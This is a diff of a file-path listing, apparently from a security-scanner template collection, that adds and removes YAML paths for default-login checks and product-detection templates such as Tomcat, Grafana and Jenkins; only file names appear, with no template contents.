@@ -43614,32 +43583,28 @@ ./poc/default/nps-default-login-9142.yaml ./poc/default/nps-default-login-9143.yaml ./poc/default/nps-default-login-9144.yaml -./poc/default/nps-default-login-9145.yaml ./poc/default/nps-default-password-9147.yaml ./poc/default/nps-default-password.yaml ./poc/default/nps-default-password.yml ./poc/default/ns-icg-default-password.yaml ./poc/default/nsicg-default-password.yaml ./poc/default/o2-default-password.yaml -./poc/default/octobercms-default-login-9192.yaml ./poc/default/octobercms-default-login-9193.yaml +./poc/default/octobercms-default-login.yaml ./poc/default/ofbiz-default-credentials-9207.yaml ./poc/default/ofbiz-default-credentials.yaml ./poc/default/ofbiz-default-login-9208.yaml ./poc/default/ofbiz-default-login-9209.yaml -./poc/default/ofbiz-default-login-9210.yaml ./poc/default/ofbiz-default-login-9211.yaml ./poc/default/ofbiz-default-password.yaml ./poc/default/openemr-default-login-9270.yaml -./poc/default/openemr-default-login.yaml ./poc/default/openerp-default-password.yaml ./poc/default/openwrt-default-login-9332.yaml ./poc/default/openwrt-default-login.yaml ./poc/default/operations-automation-default-page-9336.yaml -./poc/default/operations-automation-default-page-9337.yaml ./poc/default/operations-automation-default-page-9338.yaml +./poc/default/operations-automation-default-page-9339.yaml ./poc/default/operations-automation-default-page-9340.yaml -./poc/default/operations-automation-default-page.yaml ./poc/default/oracle-bi-default-credentials.yaml ./poc/default/panabit-default-login-9437.yaml ./poc/default/panabit-default-login-9438.yaml 
@@ -43651,15 +43616,18 @@ ./poc/default/panabit-gateway-default-password.yaml ./poc/default/panabit-gateway-default-password.yml ./poc/default/panabit-ixcache-default-login-9443.yaml +./poc/default/panabit-ixcache-default-login.yaml ./poc/default/panabit-ixcache-default-password.yaml ./poc/default/panabit-ixcache-default-password.yml ./poc/default/panos-default-credentials.yaml ./poc/default/panos-default-login-9454.yaml +./poc/default/panos-default-login-9455.yaml ./poc/default/panos-default-login-9456.yaml ./poc/default/panos-default-login-9457.yaml +./poc/default/panos-default-login.yaml ./poc/default/pentaho-default-login-9477.yaml -./poc/default/pentaho-default-login-9478.yaml ./poc/default/pentaho-default-login-9479.yaml +./poc/default/pentaho-default-login-9480.yaml ./poc/default/pentaho-default-login.yaml ./poc/default/peoplesoft-default-login.yaml ./poc/default/pgsql-default-db.yaml @@ -43667,8 +43635,8 @@ ./poc/default/phpmyadmin-default-page.yaml ./poc/default/poc-yaml-otter-default-password.yaml ./poc/default/postgres-default-logins.yaml +./poc/default/rabbitmq-default-admin-9780.yaml ./poc/default/rabbitmq-default-admin-9781.yaml -./poc/default/rabbitmq-default-admin-9782.yaml ./poc/default/rabbitmq-default-admin.yaml ./poc/default/rabbitmq-default-login-9783.yaml ./poc/default/rabbitmq-default-login-9784.yaml 
@@ -43679,15 +43647,18 @@ ./poc/default/rainloop-default-login-9811.yaml ./poc/default/rainloop-default-login-9812.yaml ./poc/default/rainloop-default-login-9813.yaml +./poc/default/rainloop-default-login.yaml ./poc/default/rancher-default-login-9814.yaml ./poc/default/rancher-default-login-9815.yaml ./poc/default/rancher-default-login-9816.yaml ./poc/default/rancher-default-password.yaml +./poc/default/ranger-default-login-9827.yaml ./poc/default/ranger-default-login-9828.yaml ./poc/default/redfish-bmc-default-login.yaml ./poc/default/redis-default-logins.yaml ./poc/default/rockmongo-default-credentials-9896.yaml ./poc/default/rockmongo-default-credentials.yaml +./poc/default/rockmongo-default-login-9897.yaml ./poc/default/rockmongo-default-login-9898.yaml ./poc/default/rockmongo-default-login-9899.yaml ./poc/default/rockmongo-default-login-9900.yaml @@ -43705,6 +43676,7 @@ ./poc/default/samsung-wlan-default-login-10015.yaml ./poc/default/samsung-wlan-default-login-10016.yaml ./poc/default/samsung-wlan-default-login-10017.yaml +./poc/default/samsung-wlan-default-login-10018.yaml ./poc/default/secnet-ac-default-login-10113.yaml ./poc/default/secnet-ac-default-login.yaml ./poc/default/secnet-ac-default-password.yaml 
@@ -43751,17 +43723,19 @@ ./poc/default/stackstorm-default-login.yaml ./poc/default/structurizr-default-login.yaml ./poc/default/supermicro-default-login-10572.yaml +./poc/default/supermicro-default-login.yaml ./poc/default/superset-default-login-10573.yaml ./poc/default/superset-default-login-10574.yaml ./poc/default/superset-default-login.yaml ./poc/default/szhe-default-login-10635.yaml ./poc/default/szhe-default-login-10636.yaml ./poc/default/szhe-default-login-10637.yaml -./poc/default/szhe-default-login.yaml +./poc/default/szhe-default-login-10638.yaml ./poc/default/szhe-default-password-10639.yaml ./poc/default/szhe-default-password-10640.yaml ./poc/default/szhe-default-password.yaml ./poc/default/telecom-gateway-default-login-10686.yaml +./poc/default/telecom-gateway-default-login.yaml ./poc/default/telecom-gateway-default-password.yaml ./poc/default/telecom-gateway-default-password.yml ./poc/default/timekeeper-default-login.yaml @@ -43770,6 +43744,7 @@ ./poc/default/tomcat-default-login-10789.yaml ./poc/default/tomcat-default-login-10790.yaml ./poc/default/tomcat-default-login-10791.yaml +./poc/default/tomcat-default-login.yaml ./poc/default/tomcat-default-manager.yaml ./poc/default/tomcat-manager-default-1.yaml ./poc/default/tomcat-manager-default-10.yaml 
@@ -43790,15 +43765,15 @@ ./poc/default/tomcat-manager-default-creds.yaml ./poc/default/tomcat-manager-default.yaml ./poc/default/tplink-r470gp-default-login.yaml -./poc/default/trilithic-viewpoint-default-10835.yaml ./poc/default/trilithic-viewpoint-default-10836.yaml ./poc/default/trilithic-viewpoint-default-password.yaml ./poc/default/trilithic-viewpoint-default.yaml ./poc/default/tyan-megarac-sp-default-login.yaml ./poc/default/tyan-rmm-bmc-default-login.yaml ./poc/default/ucmdb-default-login-10868.yaml -./poc/default/ucmdb-default-login-10869.yaml ./poc/default/ucmdb-default-login-10870.yaml +./poc/default/ucmdb-default-login-10871.yaml +./poc/default/ucmdb-default-login.yaml ./poc/default/utt-default-password.yaml ./poc/default/versa-default-login-11002.yaml ./poc/default/versa-default-login-11003.yaml @@ -43806,9 +43781,9 @@ ./poc/default/versa-default-password.yaml ./poc/default/versa-flexvnf-ui-default-login.yaml ./poc/default/vidyo-default-login-11008.yaml -./poc/default/vidyo-default-login-11009.yaml -./poc/default/vidyo-default-login.yaml +./poc/default/vidyo-default-login-11010.yaml ./poc/default/visionhub-default-credentials.yaml +./poc/default/visionhub-default-login-11026.yaml ./poc/default/visionhub-default-login-11027.yaml ./poc/default/visionhub-default-login-11028.yaml ./poc/default/visionhub-default-login-11029.yaml @@ -43823,7 +43798,6 @@ ./poc/default/wifisky-default-login-11203.yaml ./poc/default/wifisky-default-login-11204.yaml ./poc/default/wifisky-default-login.yaml -./poc/default/wifisky-default-password-11205.yaml ./poc/default/wifisky-default-password-11206.yaml ./poc/default/wifisky-default-password-cnvd-2021-39012.yml ./poc/default/wifisky-default-password.yaml 
@@ -43832,18 +43806,16 @@ ./poc/default/wso2-default-login-11640.yaml ./poc/default/wso2-default-login-11641.yaml ./poc/default/wso2-default-login-11642.yaml -./poc/default/wso2-default-login.yaml ./poc/default/wso2-default-password.yaml ./poc/default/xampp-default-page-11660.yaml -./poc/default/xampp-default-page-11661.yaml +./poc/default/xampp-default-page-11662.yaml ./poc/default/xampp-default-page-11663.yaml -./poc/default/xampp-default-page.yaml ./poc/default/xerox-workcentre7-default-password.yaml ./poc/default/xerox7-default-login-11678.yaml ./poc/default/xerox7-default-login-11679.yaml ./poc/default/xerox7-default-login-11680.yaml +./poc/default/xerox7-default-login.yaml ./poc/default/xerox7-default-password.yaml -./poc/default/xxljob-default-login-11709.yaml ./poc/default/xxljob-default-login-11710.yaml ./poc/default/xxljob-default-login-11711.yaml ./poc/default/xxljob-default-login-11712.yaml @@ -43871,13 +43843,14 @@ ./poc/detect/NagiosXI-CMS-Detect.yaml ./poc/detect/PFSense-Detect.yaml ./poc/detect/PRTGNetwork-Detect.yaml +./poc/detect/RedMine-Detect.yaml ./poc/detect/TestLink-Detect.yaml ./poc/detect/Tomcat-Path-normalize-detect.yaml ./poc/detect/Unifi-Detect.yaml ./poc/detect/ZoneMinder-Tech-Detect.yaml ./poc/detect/achecker-detect.yaml ./poc/detect/acontent-detect-31.yaml -./poc/detect/acontent-detect-32.yaml +./poc/detect/acontent-detect.yaml ./poc/detect/activemq-openwire-transport-detect.yaml ./poc/detect/ad-blocking-detector-29a2fe62a95c9b7d06f91cd4f479a678.yaml ./poc/detect/ad-blocking-detector.yaml @@ -43885,8 +43858,8 @@ ./poc/detect/adbhoney-detection-shell.yaml ./poc/detect/adbhoney-honeypot-cnxn-detect.yaml ./poc/detect/adbhoney-honeypot-shell-detect.yaml +./poc/detect/addeventlistener-detect-64.yaml ./poc/detect/addeventlistener-detect-65.yaml -./poc/detect/addeventlistener-detect-66.yaml ./poc/detect/addeventlistener-detect.yaml ./poc/detect/adminer-panel-detect.yaml ./poc/detect/admiralcloud-detect.yaml 
@@ -43896,7 +43869,6 @@ ./poc/detect/adobe-coldfusion-detect-4.yaml ./poc/detect/adobe-coldfusion-detect-5.yaml ./poc/detect/adobe-coldfusion-detect-6.yaml -./poc/detect/adobe-coldfusion-detect-82.yaml ./poc/detect/adobe-coldfusion-detect-83.yaml ./poc/detect/adobe-coldfusion-detect-84.yaml ./poc/detect/adobe-coldfusion-detector-1.yaml @@ -43907,8 +43879,9 @@ ./poc/detect/adobe-coldfusion-detector-6.yaml ./poc/detect/adobe-coldfusion-detector-error.yaml ./poc/detect/adobe-coldfusion-error-detect-85.yaml +./poc/detect/adobe-coldfusion-error-detect-86.yaml ./poc/detect/adobe-coldfusion-error-detect-87.yaml -./poc/detect/adobe-coldfusion-error-detect-88.yaml +./poc/detect/adobe-coldfusion-error-detect.yaml ./poc/detect/adselfservice-version-detect.yaml ./poc/detect/aem-detection-143.yaml ./poc/detect/aem-detection-144.yaml 
@@ -43916,36 +43889,38 @@ ./poc/detect/aem-detection.yaml ./poc/detect/airflow-detect-237.yaml ./poc/detect/airflow-detect-238.yaml -./poc/detect/airflow-detect-239.yaml +./poc/detect/airflow-detect-240.yaml ./poc/detect/aix-websm-detect.yaml ./poc/detect/alfresco-detect-258.yaml -./poc/detect/alfresco-detect-259.yaml +./poc/detect/alfresco-detect-260.yaml ./poc/detect/alfresco-detect.yaml ./poc/detect/amazon-mws-auth-token-detect.yaml ./poc/detect/amazon-sns-topic-disclosure-detect.yaml ./poc/detect/apache-activemq-detect.yaml +./poc/detect/apache-answer-detect.yaml ./poc/detect/apache-axis-detect-1.yaml ./poc/detect/apache-axis-detect-2.yaml ./poc/detect/apache-axis-detect-3.yaml +./poc/detect/apache-axis-detect-339.yaml ./poc/detect/apache-axis-detect-340.yaml -./poc/detect/apache-axis-detect.yaml -./poc/detect/apache-cocoon-detect-342.yaml +./poc/detect/apache-axis-detect-341.yaml +./poc/detect/apache-cocoon-detect.yaml ./poc/detect/apache-detect-345.yaml +./poc/detect/apache-detect-346.yaml ./poc/detect/apache-detect-347.yaml ./poc/detect/apache-detect-348.yaml ./poc/detect/apache-detect-349.yaml -./poc/detect/apache-detect.yaml ./poc/detect/apache-druid-detect.yaml ./poc/detect/apache-dubbo-detect.yaml ./poc/detect/apc-detect.yaml -./poc/detect/apollo-server-detect-522.yaml +./poc/detect/apollo-server-detect-523.yaml +./poc/detect/apollo-server-detect.yaml ./poc/detect/aptus-detect.yaml ./poc/detect/argocd-detect.yaml ./poc/detect/arris-modem-detect.yaml -./poc/detect/artica-web-proxy-detect-543.yaml ./poc/detect/artica-web-proxy-detect-544.yaml -./poc/detect/artica-web-proxy-detect-545.yaml ./poc/detect/artica-web-proxy-detect-546.yaml +./poc/detect/artica-web-proxy-detect.yaml ./poc/detect/artifactory-version-detect.yaml ./poc/detect/aspnet-version-detect.yaml ./poc/detect/atlantis-detect.yaml 
@@ -43953,11 +43928,10 @@ ./poc/detect/audiocodes-detect.yaml ./poc/detect/autobahn-python-detect-592.yaml ./poc/detect/autobahn-python-detect-593.yaml -./poc/detect/autobahn-python-detect-595.yaml +./poc/detect/autobahn-python-detect-594.yaml ./poc/detect/autoset-detect.yaml ./poc/detect/avantfax-detect-598.yaml ./poc/detect/avantfax-detect-599.yaml -./poc/detect/avantfax-detect-600.yaml ./poc/detect/avantfax-detect.yaml ./poc/detect/aviatrix-detect-606.yaml ./poc/detect/aviatrix-detect-607.yaml @@ -43966,7 +43940,6 @@ ./poc/detect/aws-elastic-beanstalk-detect-642.yaml ./poc/detect/aws-elastic-beanstalk-detect-643.yaml ./poc/detect/aws-elastic-beanstalk-detect-644.yaml -./poc/detect/aws-elastic-beanstalk-detect.yaml ./poc/detect/aws-sftp-detect.yaml ./poc/detect/axigen-mail-server-detect.yaml ./poc/detect/axis-detect.yaml @@ -43976,8 +43949,8 @@ ./poc/detect/azure-takeover-detection-683.yaml ./poc/detect/azure-takeover-detection.yaml ./poc/detect/basic-auth-detect.yaml -./poc/detect/basic-auth-detection-687.yaml ./poc/detect/basic-auth-detection-688.yaml +./poc/detect/basic-auth-detection-689.yaml ./poc/detect/basic-auth-detection-691.yaml ./poc/detect/basic-auth-detection.yaml ./poc/detect/bedita-detect-704.yaml @@ -43985,11 +43958,13 @@ ./poc/detect/bedita-detect.yaml ./poc/detect/bgp-detect.yaml ./poc/detect/bigbluebutton-detect-722.yaml -./poc/detect/bigbluebutton-detect-723.yaml +./poc/detect/bigbluebutton-detect.yaml ./poc/detect/bigip-config-utility-detect-1.yaml ./poc/detect/bigip-config-utility-detect-2.yaml ./poc/detect/bigip-config-utility-detect-3.yaml +./poc/detect/bigip-config-utility-detect-730.yaml ./poc/detect/bigip-config-utility-detect-731.yaml +./poc/detect/bigip-config-utility-detect-732.yaml ./poc/detect/bigip-config-utility-detect.yaml ./poc/detect/bigip-detection-734.yaml ./poc/detect/bigip-detection.yaml 
@@ -44012,23 +43987,20 @@ ./poc/detect/brother-printer-detect-790.yaml ./poc/detect/brother-printer-detect.yaml ./poc/detect/burp-api-detect-809.yaml -./poc/detect/burp-api-detect-812.yaml +./poc/detect/burp-api-detect-810.yaml ./poc/detect/burp-api-detect-813.yaml ./poc/detect/burp-api-detect.yaml ./poc/detect/cacti-detect-1.yaml ./poc/detect/cacti-detect-2.yaml -./poc/detect/cacti-detect-826.yaml ./poc/detect/cacti-detect.yaml ./poc/detect/carestream-vue-detect-1.yaml ./poc/detect/carestream-vue-detect-2.yaml ./poc/detect/carestream-vue-detect-859.yaml ./poc/detect/carestream-vue-detect-860.yaml -./poc/detect/carestream-vue-detect-861.yaml ./poc/detect/ccm-detect.yaml ./poc/detect/celebrus-detect.yaml ./poc/detect/centreon-detect-875.yaml ./poc/detect/centreon-detect-876.yaml -./poc/detect/centreon-detect-877.yaml ./poc/detect/centreon-detect.yaml ./poc/detect/changedetection-panel.yaml ./poc/detect/chatgpt-next-detection.yaml @@ -44047,15 +44019,14 @@ ./poc/detect/cisco-webvpn-detect.yaml ./poc/detect/citrix-adc-gateway-detect-1.yaml ./poc/detect/citrix-adc-gateway-detect-2.yaml -./poc/detect/citrix-adc-gateway-detect-981.yaml ./poc/detect/citrix-adc-gateway-detect-982.yaml +./poc/detect/citrix-adc-gateway-detect-983.yaml ./poc/detect/citrix-adc-gateway-detect.yaml ./poc/detect/citrix-honeypot-detect.yaml ./poc/detect/citrix-honeypot-detection.yaml ./poc/detect/citrix-netscaler-gateway-detect.yml ./poc/detect/citrix-vpn-detect-985.yaml ./poc/detect/citrix-vpn-detect-986.yaml -./poc/detect/citrix-vpn-detect-987.yaml ./poc/detect/citrix-vpn-detect.yaml ./poc/detect/clamav-detect.yaml ./poc/detect/clickhouse-db-detect.yaml 
@@ -44064,19 +44035,18 @@ ./poc/detect/cms-detect.yaml ./poc/detect/cname-service-detection-1032.yaml ./poc/detect/cname-service-detection.yaml -./poc/detect/cname-service-detector-1034.yaml ./poc/detect/cname-service-detector.yaml ./poc/detect/cobbler-version-detect.yaml ./poc/detect/cockpit-detect-1125.yaml -./poc/detect/cockpit-detect-1127.yaml +./poc/detect/cockpit-detect-1126.yaml ./poc/detect/cockpit-detect-1128.yaml ./poc/detect/cofense-vision-detection.yaml ./poc/detect/colasoft-network-information-comprehensive-detection-and-processing-platform.yaml ./poc/detect/comprehensive-swagger-ui-version-detection.yaml ./poc/detect/confluence-detect-1.yaml ./poc/detect/confluence-detect-1186.yaml -./poc/detect/confluence-detect-1187.yaml ./poc/detect/confluence-detect-1188.yaml +./poc/detect/confluence-detect-1189.yaml ./poc/detect/confluence-detect-2.yaml ./poc/detect/confluence-detect-3.yaml ./poc/detect/confluence-detect-4.yaml @@ -44094,14 +44064,14 @@ ./poc/detect/cql-native-transport-detect.yaml ./poc/detect/craft-cms-detect-1246.yaml ./poc/detect/craft-cms-detect-1247.yaml -./poc/detect/craft-cms-detect.yaml ./poc/detect/craftercms-detect.yaml ./poc/detect/create-mysql-detection.yaml ./poc/detect/crush-ftp-detect-1270.yaml ./poc/detect/crush-ftp-detect-1271.yaml +./poc/detect/crush-ftp-detect-1272.yaml ./poc/detect/crush-ftp-detect.yaml -./poc/detect/csrfguard-detect-1290.yaml ./poc/detect/csrfguard-detect-1291.yaml +./poc/detect/csrfguard-detect.yaml ./poc/detect/ctcms-detect.yaml ./poc/detect/cucm-detect.yaml ./poc/detect/custom-aem-ACPV-detect.yaml @@ -44111,6 +44081,7 @@ ./poc/detect/custom-connection-server-detect.yaml ./poc/detect/custom-ctc-panel-detect.yaml ./poc/detect/custom-data-alert-engine-service-detect.yaml +./poc/detect/custom-data-result-service-detect.yaml ./poc/detect/custom-datadump-source-code-detect.yaml ./poc/detect/custom-dom-xss-detect.yaml ./poc/detect/custom-dot-git-detect.yaml 
@@ -44144,8 +44115,8 @@ ./poc/detect/defaced-website-detect.yaml ./poc/detect/defacement-detect.yaml ./poc/detect/default-detect-generic-6837.yaml -./poc/detect/default-detect-generic-6838.yaml ./poc/detect/default-detect-generic-6839.yaml +./poc/detect/default-detect-generic.yaml ./poc/detect/dell-bmc-panel-detect.yaml ./poc/detect/dell-idrac6-detect-6918.yaml ./poc/detect/dell-idrac6-detect-6919.yaml @@ -44155,10 +44126,12 @@ ./poc/detect/dell-idrac7-detect-6923.yaml ./poc/detect/dell-idrac7-detect-6924.yaml ./poc/detect/dell-idrac7-detect-6925.yaml +./poc/detect/dell-idrac7-detect.yaml ./poc/detect/dell-idrac8-detect-6926.yaml ./poc/detect/dell-idrac8-detect-6928.yaml ./poc/detect/dell-idrac8-detect-6929.yaml ./poc/detect/dell-idrac9-detect-6936.yaml +./poc/detect/dell-idrac9-detect-6937.yaml ./poc/detect/dell-idrac9-detect-6938.yaml ./poc/detect/dell-idrac9-detect-6940.yaml ./poc/detect/dell-idrac9-detect-6941.yaml @@ -44171,17 +44144,19 @@ ./poc/detect/detect-all-takeovers.yaml ./poc/detect/detect-all-takovers.yaml ./poc/detect/detect-dangling-cname-6966.yaml +./poc/detect/detect-dangling-cname-6967.yaml ./poc/detect/detect-dangling-cname-6968.yaml ./poc/detect/detect-dns-over-https-6969.yaml ./poc/detect/detect-dns-over-https.yaml ./poc/detect/detect-drone-config-6971.yaml ./poc/detect/detect-drone-config-6972.yaml +./poc/detect/detect-drone-config-6973.yaml ./poc/detect/detect-drone.yaml ./poc/detect/detect-generic-website.yaml ./poc/detect/detect-jabber-xmpp-6974.yaml ./poc/detect/detect-jabber-xmpp-6975.yaml ./poc/detect/detect-jabber-xmpp.yaml -./poc/detect/detect-options-method-6978.yaml +./poc/detect/detect-options-method-6977.yaml ./poc/detect/detect-options-method.yaml ./poc/detect/detect-rsyncd-6979.yaml ./poc/detect/detect-rsyncd-6980.yaml 
@@ -44215,6 +44190,7 @@ ./poc/detect/django-debug-detect-7027.yaml ./poc/detect/django-debug-detect.yaml ./poc/detect/dns-saas-service-detection.yaml +./poc/detect/dns-waf-detect-7052.yaml ./poc/detect/dns-waf-detect-7053.yaml ./poc/detect/dns-waf-detect-7054.yaml ./poc/detect/dns-waf-detect.yaml @@ -44228,17 +44204,20 @@ ./poc/detect/dotclear-detect.yaml ./poc/detect/dotcms-version-detect.yaml ./poc/detect/dotnet-remoting-service-detect.yaml -./poc/detect/druid-detect-7098.yaml ./poc/detect/druid-detect-7099.yaml ./poc/detect/druid-detect.yaml +./poc/detect/dwr-index-detect-7135.yaml ./poc/detect/dwr-index-detect-7136.yaml +./poc/detect/dwr-index-detect.yaml ./poc/detect/eaton-power-manager-detect.yaml ./poc/detect/ec2-detection-7161.yaml -./poc/detect/ec2-detection-7162.yaml +./poc/detect/ec2-detection-7163.yaml ./poc/detect/eg-manager-detect-7182.yaml ./poc/detect/eg-manager-detect-7184.yaml +./poc/detect/eg-manager-detect.yaml ./poc/detect/elasticpot-honeypot-detection.yaml ./poc/detect/elasticsearch-sql-client-detect-7189.yaml +./poc/detect/elasticsearch-sql-client-detect-7190.yaml ./poc/detect/elasticsearch-sql-client-detect-7191.yaml ./poc/detect/elasticsearch-sql-client-detect-7192.yaml ./poc/detect/electron-version-detect.yaml @@ -44250,6 +44229,7 @@ ./poc/detect/ems-webclient-detect.yaml ./poc/detect/epson-access-detect-7233.yaml ./poc/detect/epson-access-detect-7234.yaml +./poc/detect/epson-access-detect-7235.yaml ./poc/detect/epson-access-detect-7236.yaml ./poc/detect/epson-access-detect-7237.yaml ./poc/detect/epson-access-detect.yaml 
@@ -44269,8 +44249,9 @@ ./poc/detect/fanruanoa-detect-1.yaml ./poc/detect/fanruanoa-detect-2.yaml ./poc/detect/fanruanoa-detect-7391.yaml +./poc/detect/fanruanoa-detect-7392.yaml ./poc/detect/fanruanoa2012-detect-7387.yaml -./poc/detect/fanruanoa2012-detect.yaml +./poc/detect/fanruanoa2012-detect-7388.yaml ./poc/detect/fatpipe-mpvpn-detect-7437.yaml ./poc/detect/fatpipe-mpvpn-detect-7438.yaml ./poc/detect/fatpipe-mpvpn-detect.yaml @@ -44278,7 +44259,6 @@ ./poc/detect/fatpipe-warp-detect-7440.yaml ./poc/detect/fatpipe-warp-detect.yaml ./poc/detect/favicon-detect.yaml -./poc/detect/favicon-detection-7441.yaml ./poc/detect/favicon-detection-7442.yaml ./poc/detect/favicon-detection-7443.yaml ./poc/detect/favicon-detection-7445.yaml @@ -44301,6 +44281,7 @@ ./poc/detect/fortinet-detect.yaml ./poc/detect/froxlor-detect-7551.yaml ./poc/detect/froxlor-detect-7552.yaml +./poc/detect/froxlor-detect-7553.yaml ./poc/detect/froxlor-detect-7554.yaml ./poc/detect/fuji-xerox-printer-detect.yaml ./poc/detect/gaspot-honeypot-detect.yaml @@ -44308,6 +44289,7 @@ ./poc/detect/geowebserver-detector.yaml ./poc/detect/gerapy-detect.yaml ./poc/detect/gespage-detect-7602.yaml +./poc/detect/gespage-detect-7603.yaml ./poc/detect/gespage-detect.yaml ./poc/detect/getsimple-cms-detect-1.yaml ./poc/detect/getsimple-cms-detect-2.yaml @@ -44326,6 +44308,7 @@ ./poc/detect/gitea-detect.yaml ./poc/detect/github-enterprise-detect-7647.yaml ./poc/detect/github-enterprise-detect-7648.yaml +./poc/detect/github-enterprise-detect-7649.yaml ./poc/detect/github-enterprise-detect-7650.yaml ./poc/detect/github-enterprise-detect-7651.yaml ./poc/detect/github-enterprise-detect.yaml 
@@ -44353,14 +44336,13 @@ ./poc/detect/grafana-detect-7805.yaml ./poc/detect/grafana-detect-7806.yaml ./poc/detect/grafana-detect-7807.yaml -./poc/detect/grafana-detect-7808.yaml ./poc/detect/grafana-detect.yaml ./poc/detect/graphite-browser-detect.yaml ./poc/detect/graphql-apiforwp-detect.yaml ./poc/detect/graphql-apollo-detect.yaml ./poc/detect/graphql-ariadne-detect.yaml ./poc/detect/graphql-detect-7829.yaml -./poc/detect/graphql-detect-7831.yaml +./poc/detect/graphql-detect-7830.yaml ./poc/detect/graphql-detect-7832.yaml ./poc/detect/graphql-detect.yaml ./poc/detect/graphql-dianajl-detect.yaml 
@@ -44381,43 +44363,39 @@ ./poc/detect/grav-cms-detect-7841.yaml ./poc/detect/grav-cms-detect-7842.yaml ./poc/detect/grav-cms-detect-7845.yaml -./poc/detect/grav-cms-detect.yaml -./poc/detect/gunicorn-detect-7862.yaml ./poc/detect/gunicorn-detect-7863.yaml ./poc/detect/gunicorn-detect-7864.yaml ./poc/detect/gunicorn-detect-7865.yaml ./poc/detect/hanwang-detect-7881.yaml ./poc/detect/hanwang-detect-7882.yaml -./poc/detect/harbor-detect-7886.yaml ./poc/detect/harbor-detect-7887.yaml ./poc/detect/harbor-detect-7888.yaml ./poc/detect/harbor-detect.yaml ./poc/detect/hash-detection.yaml -./poc/detect/herokuapp-detect-7937.yaml ./poc/detect/herokuapp-detect-7938.yaml -./poc/detect/herokuapp-detect-7939.yaml ./poc/detect/herokuapp-detect-7940.yaml ./poc/detect/herokuapp-detect.yaml ./poc/detect/hikvision-detect.yaml ./poc/detect/hikvision-detection-1.yaml ./poc/detect/hikvision-detection-2.yaml +./poc/detect/hikvision-detection-7954.yaml +./poc/detect/hikvision-detection-7955.yaml ./poc/detect/hikvision-detection.yaml ./poc/detect/home-assistant-detect.yaml ./poc/detect/hp-blade-admin-detect-8003.yaml -./poc/detect/hp-blade-admin-detect-8004.yaml ./poc/detect/hp-blade-admin-detect-8005.yaml ./poc/detect/hp-color-laserjet-detect.yaml ./poc/detect/hp-device-info-detect-8007.yaml ./poc/detect/hp-device-info-detect-8008.yaml -./poc/detect/hp-device-info-detect-8010.yaml +./poc/detect/hp-device-info-detect-8009.yaml ./poc/detect/hp-device-info-detect.yaml ./poc/detect/hp-laserjet-detect-8026.yaml ./poc/detect/hp-laserjet-detect-8027.yaml ./poc/detect/hp-laserjet-detect-8028.yaml ./poc/detect/hp-media-vault-detect-8029.yaml -./poc/detect/hp-media-vault-detect-8030.yaml ./poc/detect/hp-media-vault-detect-8031.yaml ./poc/detect/htpasswd-detection-8045.yaml +./poc/detect/htpasswd-detection-8046.yaml ./poc/detect/htpasswd-detection.yaml ./poc/detect/httpbin-detection.yaml ./poc/detect/httpbin-detection.yml 
@@ -44447,17 +44425,15 @@ ./poc/detect/istat-panel-detect.yaml ./poc/detect/itop-detect-8201.yaml ./poc/detect/itop-detect-8202.yaml -./poc/detect/itop-detect-8203.yaml ./poc/detect/itop-detect.yaml ./poc/detect/jaspersoft-detect-8219.yaml -./poc/detect/jaspersoft-detect-8220.yaml ./poc/detect/jaspersoft-detect.yaml +./poc/detect/java-rmi-detect-8227.yaml ./poc/detect/java-rmi-detect-8228.yaml ./poc/detect/java-rmi-detect.yaml ./poc/detect/javamelody-detect.yaml -./poc/detect/jboss-detect.yaml +./poc/detect/jboss-detect-8237.yaml ./poc/detect/jeecg-boot-detect-8247.yaml -./poc/detect/jeecg-boot-detect-8248.yaml ./poc/detect/jeedom-detect-8250.yaml ./poc/detect/jeedom-detect-8251.yaml ./poc/detect/jeedom-detect.yaml @@ -44466,23 +44442,24 @@ ./poc/detect/jellyfin-detect-4.yaml ./poc/detect/jellyfin-detect-8256.yaml ./poc/detect/jellyfin-detect-8257.yaml -./poc/detect/jellyfin-detect-8258.yaml +./poc/detect/jellyfin-detect-8259.yaml ./poc/detect/jellyfin-detect-8260.yaml +./poc/detect/jellyfin-detect.yaml ./poc/detect/jenkins-detect-8274.yaml -./poc/detect/jenkins-detect-8275.yaml +./poc/detect/jenkins-detect-8276.yaml ./poc/detect/jenkins-detect.yaml ./poc/detect/jenkins-headers-detect.yaml ./poc/detect/jenkins-login-detection.yaml ./poc/detect/jira-detect-1.yaml ./poc/detect/jira-detect-2.yaml ./poc/detect/jira-detect-3.yaml -./poc/detect/jira-detect-8314.yaml +./poc/detect/jira-detect-8313.yaml ./poc/detect/jira-detect-8315.yaml ./poc/detect/jira-detect-8316.yaml ./poc/detect/jira-detect.yaml ./poc/detect/js-libraries-detect.yaml ./poc/detect/jsf-detection-8396.yaml -./poc/detect/jsf-detection-8397.yaml +./poc/detect/jsf-detection-8398.yaml ./poc/detect/jsf-detection.yaml ./poc/detect/jwt-detection.yaml ./poc/detect/kavita-panel-detect.yaml 
@@ -44493,7 +44470,7 @@ ./poc/detect/kibana-detect-1.yaml ./poc/detect/kibana-detect-2.yaml ./poc/detect/kibana-detect-3.yaml -./poc/detect/kibana-detect-8484.yaml +./poc/detect/kibana-detect-8483.yaml ./poc/detect/kibana-detect.yaml ./poc/detect/kong-detect-8498.yaml ./poc/detect/kong-detect-8499.yaml @@ -44520,7 +44497,9 @@ ./poc/detect/linkerd-badrule-detect-8630.yaml ./poc/detect/linkerd-badrule-detect-8631.yaml ./poc/detect/linkerd-badrule-detect.yaml -./poc/detect/linkerd-detect-8632.yaml +./poc/detect/linkerd-detect-8633.yaml +./poc/detect/linkerd-detect.yaml +./poc/detect/linkerd-service-detect-8634.yaml ./poc/detect/linkerd-service-detect-8635.yaml ./poc/detect/linkerd-service-detect.yaml ./poc/detect/linkerd-ssrf-detect-8636.yaml @@ -44544,13 +44523,14 @@ ./poc/detect/magento-detect-8706.yaml ./poc/detect/magento-detect-8707.yaml ./poc/detect/magmi-detect-8714.yaml -./poc/detect/magmi-detect-8715.yaml +./poc/detect/magmi-detect-8716.yaml ./poc/detect/magmi-detect-8717.yaml ./poc/detect/mahara-version-detect.yaml ./poc/detect/maian-cart-detect-8718.yaml -./poc/detect/maian-cart-detect-8719.yaml +./poc/detect/maian-cart-detect.yaml ./poc/detect/mailoney-honeypot-detect.yaml ./poc/detect/mailoney-honeypot-detection.yaml +./poc/detect/mantis-detect-8780.yaml ./poc/detect/mantis-detect-8781.yaml ./poc/detect/mantis-detect.yaml ./poc/detect/mautic-crm-detect-8787.yaml 
